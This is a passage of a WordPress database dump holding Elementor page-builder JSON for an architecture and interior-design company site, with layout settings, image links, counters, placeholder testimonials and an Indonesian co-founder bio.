\",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"6dcb687\",\"phone_label\":\"0822 9777 5589\",\"phone_address\":\"082297775589\"}],\"alignment\":\"center\",\"label_color\":\"#FFFFFF\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"label_typography_font_weight\":\"700\",\"label_margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display\":\"inline-flex\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"700\",\"info_color\":\"#E3B25A\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display_mobile\":\"inline-block\",\"alignment_mobile\":\"center\",\"info_item_alignment_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"1dbd858\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact with us\",\"background_color\":\"#FFFFFF\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"38\",\"bottom\":\"18\",\"left\":\"38\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"button_text_color\":\"#2D2D2D\",\"hover_color\":\"#FFFFFF\",\"button_bg_hover\":\"#E3B25A\",\"_animation\":\"none\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a9e80df\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-66\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c5b31d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1ecd2ea\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"40\",\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":10,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.1)\"},\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"50\",\"bottom\":\"40\",\"left\":\"50\",\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-110\",\"left\":0,\"isLinked\":false},\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-couter.png\",\"id\":3570,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"%\",\"size\":-290,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":120,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":53,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":71,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"30\",\"bottom\":\"40\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[{\"id\":\"617f43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ac2aeba\",\"elType\":\"widget\",\"settings\":{\"title\":\"Project Completed\",\"icon\":{\"value\":\"flaticon flaticon-architect-1\",\"library\":\"flaticon\"},\"number\":6800},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"431e0f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"da1e266\",\"elType\":\"widget\",\"settings\":{\"title\":\"Architectures\",\"number\":906,\"icon\":{\"value\":\"flaticon flaticon-architect\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"5255259\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"083da50\",\"elType\":\"widget\",\"settings\":{\"title\":\"Service providing\",\"number\":200,\"icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"944a539\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"d0e2ce9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy customers\",\"number\":9760,\"icon\":{\"value\":\"flaticon flaticon-satisfaction\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4388608\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b6b9eaa\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a2ebcc\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our Architects\",\"title\":\"Our expert team\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"9d2f9e3\",\"elType\":\"widget\",\"settings\":{\"info_background_background\":\"classic\",\"info_background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-lines-team.png\",\"id\":937,\"alt\":\"\",\"source\":\"library\"},\"info_background_position\":\"top right\",\"info_background_repeat\":\"no-repeat\",\"total_count\":6,\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_team\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7836724\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b90ed21\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b88a577\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01.png\",\"id\":752,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ad43d0d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"35d31c6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02.png\",\"id\":753,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0eaabe3\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4c51b79\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03.png\",\"id\":754,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ee06889\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"02c4aae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04.png\",\"id\":755,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c6b5264\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c3c96cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05.jpg.png\",\"id\":757,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6720e69\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"77fc613\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06.png\",\"id\":756,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(3966,4885,'_elementor_page_assets','a:1:{s:6:\"styles\";a:4:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";}}'),(3967,4885,'_elementor_pro_version','3.8.1'),(3968,4886,'_wp_page_template','elementor_header_footer'),(3969,4886,'_elementor_edit_mode','builder'),(3970,4886,'_elementor_template_type','wp-page'),(3971,4886,'_elementor_version','3.8.1'),(3972,4886,'_elementor_data','[{\"id\":\"013ca3e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-section-1.png\",\"id\":3589,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center right\",\"background_repeat\":\"no-repeat\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false},\"background_position_tablet\":\"top right\",\"background_size\":\"auto\",\"gap\":\"no\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"b6a844e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50.684,\"_inline_size_tablet\":100,\"align\":\"flex-end\",\"align_tablet\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-right\",\"animation_tablet\":\"none\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"56708b8\",\"elType\":\"widget\",\"settings\":{\"template\":\"template_2\",\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-get-to-know-us.jpg\",\"id\":710,\"alt\":\"\",\"source\":\"library\"},\"show_line_left\":\"yes\",\"text_left\":\"Architect\",\"text_left_margin\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"image_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_height_mobile\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"line_width_left_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"1829eb5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":49.316,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-left\",\"animation_tablet\":\"none\"},\"elements\":[{\"id\":\"2733af6\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"John Alan\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"dcb995a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Pengusaha di bidang kontraktor, konsultan interior design, property developer, hotel dan F&amp;B yang telah berpengalaman sejak tahun 2005.<\\/p><p>Selain sebagai pengusaha, John Alan juga merupakan business coach yang aktif dalam mengembangkan komunitas wirausaha dan telah berkolaborasi dengan para pakar di berbagai industri.<\\/p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2eb768f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi perencanaan & interior design\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"ced22e0\"},{\"text\":\"Penyusunan Rencana Anggaran Belanja\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Produksi furniture dan pekerjaan sipil\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"space_between\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"space_between_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"icon_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"f3caa1a\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\"},\"elements\":[{\"id\":\"697046f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20},\"elements\":[{\"id\":\"4b2c591\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/09\\/john_allan.jpg\",\"id\":4839,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_element_width\":\"auto\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"_border_color\":\"#E3B25A\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"9b875c0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":79.92,\"space_between_widgets\":10},\"elements\":[{\"id\":\"1150f91\",\"elType\":\"widget\",\"settings\":{\"title\":\"John Alan\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h3\",\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"23ae2ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"CO - FOUNDER\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e8e90de\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5b19198\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d460dea\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking about BauHaus\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"da0b416\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"11f956f\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"d232423\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#E3B25A\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"8056628\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\",\"_id\":\"51a9c88\"}],\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9c560b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"63f0bcf\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9b446cc\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"94218cd\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"9ac0b32\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"f80af3e\"}],\"background_item_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"-15\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"bounceInUp\",\"_animation_tablet\":\"none\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"dot_control\":\"yes\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5079813\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-contact-with-us.jpg\",\"id\":2653,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#242424\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"170\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4971895\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":30},\"elements\":[{\"id\":\"22aaaa7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Let\'s turn your ideas\\ninto reality\",\"align\":\"center\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"800\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"16\",\"bottom\":\"0\",\"left\":\"16\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_element_custom_width\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":42,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fe7bd92\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"Get your quote or WhatsApp: \",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"6dcb687\",\"phone_label\":\"0822 9777 5589\",\"phone_address\":\"082297775589\"}],\"alignment\":\"center\",\"label_color\":\"#FFFFFF\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"label_typography_font_weight\":\"700\",\"label_margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display\":\"inline-flex\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"700\",\"info_color\":\"#E3B25A\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display_mobile\":\"inline-block\",\"alignment_mobile\":\"center\",\"info_item_alignment_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"1dbd858\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact with 